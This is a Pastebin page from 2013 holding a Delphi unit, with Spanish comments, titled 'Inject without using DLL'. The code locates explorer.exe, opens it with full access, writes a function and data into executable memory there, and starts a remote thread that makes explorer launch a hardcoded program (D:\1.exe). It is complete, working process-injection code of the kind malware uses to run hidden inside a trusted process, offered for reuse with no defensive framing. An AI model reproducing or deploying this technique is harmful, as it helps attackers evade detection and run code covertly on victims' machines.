daily pastebin goal
16%
SHARE
TWEET

Inject without using DLL

appo Dec 27th, 2013 425 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  //******************************************************************************
  2. //* UNIT:        UNT_InjectNoDLL
  3. //* AUTOR:        Fakedo0r
  4. //******************************************************************************
  5. Unit UNT_InjectNoDLL;
  6. //******************************************************************************
  7. //DECLARACION DE LIBRERIAS / CLASES
  8. //******************************************************************************
  9. Interface
  10.  
  11. Uses
  12.   Winapi.Windows, TLHelp32, PsAPI, ShellAPI;
  13. //******************************************************************************
  14. //DECLARACION DE ESTRUCTURAS
  15. //******************************************************************************
  16. Type
  17.   PTINJECT = ^TINJECT;
  18.  
  19.   TINJECT = Record
  20.     __ShellExecute: Function(HWND: HWND; Operation, FileName, Parameters,
  21.       Directory: PWideChar; ShowCmd: Integer): HINST; Stdcall;
  22.  
  23.     cExe: Array [0 .. MAX_PATH] Of Char;
  24.     cOper: Array [0 .. MAX_PATH] Of Char;
  25.   End;
  26. //******************************************************************************
  27. //DECLARACION DE FUNCIONES / PROCEDIMIENTOS
  28. //******************************************************************************
  29. Procedure Inyectada(tInj: PTINJECT); Stdcall;
  30. Procedure Inyectora;
  31. Function AllocAndCopyMem(hProcess: THandle; ptBuffer: Pointer;
  32.   iBuffSize: Int64): Pointer;
  33. //******************************************************************************
  34. Implementation
  35. //******************************************************************************
  36. //<--- LA FUNCION QUE VAMOS A INYECTAR --->
  37. //******************************************************************************
  38. Procedure Inyectada(tInj: PTINJECT); Stdcall;
  39. Begin
  40.   tInj.__ShellExecute(0, tInj.cOper, tInj.cExe, Nil, Nil, 1);
  41. End;
  42. //******************************************************************************
  43. //<--- LA FUNCION QUE OPERA LA INYECCION --->
  44. //******************************************************************************
  45. Procedure Inyectora;
  46. Var
  47.   uTamFun:    UINT;
  48.   dwPID:      DWORD;
  49.   dwExitCode: DWORD;
  50.   hThread:    THandle;
  51.   hProcess:  THandle;
  52.   ptStruct:  Pointer;
  53.   ptEsp:      Pointer;
  54.   tProcEntry: TProcessEntry32;
  55.   tInj:      TINJECT;
  56. Begin
  57.   uTamFun := 0;
  58.   dwExitCode := 0;
  59.   hProcess := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  60.   tProcEntry.dwSize := Sizeof(tProcEntry);
  61.  
  62.   If Process32First(hProcess, tProcEntry) Then
  63.   Begin
  64.     Repeat
  65.       If tProcEntry.szExeFile = 'explorer.exe' Then
  66.       Begin
  67.         dwPID := tProcEntry.th32ProcessID;
  68.         Break;
  69.       End;
  70.     Until Not Process32Next(hProcess, tProcEntry);
  71.   End;
  72.  
  73.   CloseHandle(hProcess);
  74.  
  75.   // obtenemos el handle del proceso
  76.   hProcess := OpenProcess(PROCESS_ALL_ACCESS, False, dwPID);
  77.  
  78.   // obtenemos el puntero del api
  79.   @tInj.__ShellExecute := GetProcAddress(LoadLibrary('Shell32.dll'),
  80.     'ShellExecuteW');
  81.  
  82.   // copiamos los datos en las variables
  83.   lstrcpy(tInj.cExe, PChar('D:\1.exe'));
  84.   lstrcpy(tInj.cOper, PChar('open'));
  85.  
  86.   // reservamos y copiamos nuestra estructura a la memoria
  87.   ptStruct := AllocAndCopyMem(hProcess, @tInj, Sizeof(TINJECT));
  88.  
  89.   // calculamos el tamaƱo de nuestra funcion
  90.   uTamFun := UINT(@Inyectora) - UINT(@Inyectada);
  91.  
  92.   // reservamos y copiamos nuestra funcion a la memoria
  93.   ptEsp := AllocAndCopyMem(hProcess, @Inyectada, uTamFun);
  94.  
  95.   // creamos el hilo remoto
  96.   hThread := CreateRemoteThread(hProcess, Nil, 0, ptEsp, ptStruct, 0,
  97.     PDWORD(Nil)^);
  98.  
  99.   If hThread <> 0 Then
  100.   Begin
  101.     // esperamos hasta que se cree el hilo
  102.     WaitForSingleObject(hThread, INFINITE);
  103.     // obtenemos el estado de terminacion del hilo
  104.     GetExitCodeThread(hThread, dwExitCode);
  105.     // liberamos el handle del hilo creado
  106.     CloseHandle(hThread);
  107.     // liberamos el espacio en el proceso
  108.     VirtualFreeEx(hProcess, ptStruct, 0, MEM_RELEASE);
  109.     VirtualFreeEx(hProcess, ptEsp, 0, MEM_RELEASE);
  110.   End;
  111.  
  112.   // liberamos el handle del proceso
  113.   CloseHandle(hProcess);
  114. End;
  115. //******************************************************************************
  116. //<--- RESERVA ESPACIO Y ESCRIBE EN LA MEMORIA --->
  117. //******************************************************************************
  118. Function AllocAndCopyMem(hProcess: THandle; ptBuffer: Pointer;
  119.   iBuffSize: Int64): Pointer;
  120. Var
  121.   iBytesWritten: SIZE_T;
  122. Begin
  123.   iBytesWritten := 0;
  124.   // reservamos espacio
  125.   Result := VirtualAllocEx(hProcess, Nil, iBuffSize, MEM_COMMIT Or MEM_RESERVE,
  126.     PAGE_EXECUTE_READWRITE);
  127.   // escribimos
  128.   WriteProcessMemory(hProcess, Result, ptBuffer, iBuffSize, iBytesWritten);
  129. End;
  130. End.
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top